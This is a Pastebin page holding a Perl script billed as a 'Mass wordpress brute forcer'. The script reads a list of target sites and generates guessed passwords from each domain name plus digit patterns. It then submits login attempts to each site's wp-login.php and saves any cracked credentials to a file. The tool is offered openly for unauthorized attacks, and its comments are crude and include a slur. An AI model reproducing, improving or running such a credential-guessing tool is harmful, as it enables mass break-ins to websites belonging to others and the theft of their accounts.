API tools faq
paste
Advertisement
AdamTnx

Mass wordpress brute forcer

AdamTnx
Dec 17th, 2017
859
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 4.15 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. # Contact : adamtnx@gmail.com
  3. # There is no God but Allah, Muhammad is the Messenger of Allah
  4. # greetz and thanks to : fallag kill3r / bl4ck_knight
  5.  
  6. use File::Copy "cp";
  7. use Term::ANSIColor;
  8. use URI::URL;
  9. use LWP::UserAgent;
  10. use IO::Socket::INET;
  11. use HTTP::Request;
  12. use HTTP::Request::Common qw(POST);
  13. use HTTP::Request::Common qw(GET);
  14.  
  15.  
  16. if($^O =~ /Win/){ system("cls");}else{ system("clear");}
  17. print colored ("___________               ___.           __   ",'green'),"\n";  
  18. print colored ("\__    ___/___ ___  ___   \_ |__   _____/  |  ",'green'),"\n";
  19. print colored (" |    | /    \\  \/  /    | __ \ /  _ \  __\ ",'green'),"\n";
  20. print colored (" |    ||   |  \>    <     | \_\ (  <_> )  |   ",'green'),"\n";
  21. print colored (" |____||___|  /__/\_ \   |___  /\____/|__|   ",'green'),"\n";
  22. print colored ("    \/      \/      \/                        ",'green'),"\n";
  23. print colored ("                     coded by adam tnx        ",'red'),"\n";
  24. print colored ("       fb : fb//adam.ag.750                   ",'red'),"\n";
  25.  
  26.  
  27.  
  28. #besm allah
  29. print " salam for all+++";
  30.  
  31. #go go
  32. print " put your websites list dude :D";
  33. my $list=<STDIN>;
  34. chomp($list);
  35.   open (THETARGET, "<$list") || die "[-] Can't open the Website list !";
  36. @TARGETS = <THETARGET>;
  37. close THETARGET;
  38. $link=$#TARGETS + 1;
  39.  
  40. # Get da wordlist
  41.  
  42.  
  43.  
  44.  
  45. print " Path to wordlist: ";
  46. my $passp=<STDIN>;
  47. chomp($passp);
  48. cp ("$passp","adamTnx.txt");
  49.  
  50.  
  51.    
  52. changenow: foreach $tofuck(@TARGETS){
  53.  
  54. chomp($tofuck);
  55. $site = $tofuck;
  56. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  57.  
  58.  
  59. ## auto user Grab
  60.  
  61. #$aut="?author=1";
  62. #$adamTnx=$site.$aut;
  63. #$resp = $ua->request(HTTP::Request->new(GET => $adamTnx));
  64. #$cont = $resp->content;
  65. #while($cont =~ m/<title>(.*?) \|/g){
  66. $admin = "webmaster";
  67. #}
  68. ## Create Password List
  69.  
  70. $wp1 = $site . '/wp-login.php';
  71. $resp = $ua->request(HTTP::Request->new(GET => $wp1));
  72. $contg = $resp->content;
  73. while($contg =~ m/<p id="backtoblog"><a href="http:\/\/(.*?)\//g){
  74. $gpfw = $1;
  75. }
  76.  
  77. print"\n[NOTE] I Will Generate a Passordlist \n[Wait]..............................";
  78. sleep(2);
  79. #U Can Add Some Word here and Dont call this recode hhhh
  80. @tnx = ('0','1','2','3','4','5','6','7','8','9','11','22','33','44','55','66','77','88','99','00','000','111','222','333','444','555','666','777','888','999','001','002','003','004','005','006','007','008','009','010','2000','2001','2002','2003','2004','2005','2006','2007','2008','2009','2010','2011','2012','2013','2014','2015','1','12','123','1234','12345','123456','1234567','12345678','123456789','1234567890','0987654321','987654321','87654321','7654321','654321','54321','4321','321','21','01','012','0123','01234','012345','0123456','01234567','012345678','0123456789','01234567890','0123456789','012345678','01234567','0123456','012345','01234','0123','012','121','131','124','123123','abc123','321321','321123','123321','112233','332211','102030','010203');
  81. changenow: foreach $tnx(@tnx){
  82. $pg="$gpfw$tnx";
  83. $pg2="$admin$tnx";
  84. open (TEXT, '>>adamTnx.txt');
  85. print TEXT "$pg\n";
  86. print TEXT "$pg2\n";
  87. close (TEXT);
  88. }
  89. $pass = "adamTnx.txt";
  90.   open (PASSWORD, "<$pass") || die "[-] Can't open the wordlist file !";
  91. @PASSWORDS = <PASSWORD>;
  92. close PASSWORD;
  93. $pass=$#PASSWORDS + 1;
  94.  
  95.  
  96.  
  97. $red = $site . '/wp-admin/';
  98. $wp = $site . '/wp-login.php';
  99.  
  100.  
  101. print "\nSite: $site\nUser: $admin\n Wait bro...\n\n";
  102.  
  103. ## boooom nigga
  104.  
  105. foreach $pass(@PASSWORDS){
  106. chomp($pass);
  107. print "searching $pass\n";
  108. $brute = POST $wp, [log => $admin, pwd => $pass, wp-submit => 'Log In', redirect_to => $red];
  109. $response = $ua->request($brute);
  110. $stat = $response->status_line;
  111.     if ($stat =~ /302/){
  112.  
  113. print colored ("[fucked and yfz] $site=> User :$admin Password:$pass",'white on_red'),"\n";
  114.     open (TEXT, '>>fucked.txt');
  115.     print TEXT "[BOOM] $site=> User :$admin Password:$pass\n\++++++++++Coded by adam tnx / enjoy :D \n++++++++++\n";
  116.     close (TEXT);
  117.  
  118. $fucked++;
  119.         next changenow;
  120.     }
  121.     if ($stat =~ /404/){
  122.     print "$site not a wordpress site \n";
  123.     next changenow;
  124.     };
  125. }
  126. }
  127. if(!$link){$link=0;}if(!$fucked){$fucked=0;}
  128. if($link){
  129. print "\n[TOTAL BRUTED] websites -> $link \n[TOTAL FUCKED] websites -> $fucked\n";
  130.  
  131. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!